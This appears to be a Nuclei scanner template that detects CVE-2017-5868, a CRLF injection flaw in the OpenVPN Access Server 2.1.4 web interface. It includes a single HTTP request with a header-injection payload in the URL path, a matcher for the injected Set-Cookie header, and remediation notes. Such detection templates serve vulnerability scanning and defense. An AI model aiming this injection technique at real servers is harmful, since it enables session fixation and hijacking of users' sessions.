id: CVE-2017-5868

info:
  name: OpenVPN Access Server 2.1.4 - CRLF Injection
  author: ritikchaddha
  severity: medium
  description: |
    CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to __session_start__/.
  impact: |
    Attackers can inject arbitrary HTTP headers to conduct session fixation attacks, potentially hijacking user sessions or performing HTTP response splitting attacks.
  remediation: |
    Update to the latest version of OpenVPN Access Server or apply vendor-provided security patches.
  reference:
    - https://www.openwall.com/lists/oss-security/2017/05/23/13
    - http://www.securitytracker.com/id/1038547
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5868
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-5868
    cwe-id: CWE-93
    epss-score: 0.08462
    epss-percentile: 0.92495
    cpe: cpe:2.3:a:openvpn:openvpn_access_server:2.1.4:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openvpn
    product: openvpn_access_server
    shodan-query: cpe:"cpe:2.3:a:openvpn:openvpn_access_server"
  tags: cve,cve2017,openvpn,crlf,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/__session_start__/%0aSet-Cookie:%20crlfinjection=1;"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - "^Set-Cookie: crlfinjection=1;"

      - type: status
        status:
          - 302
# digest: 4a0a00473045022100bc3a96ad621a83f91f052c9f1765c9022753da136c1e9edc5965af48900b26c3022061728e059ae5fa84b721d5b87a0496676391ea176ccc2af8c0857b95e2d2bbc1:922c64590222798bb761d5b6d8e72950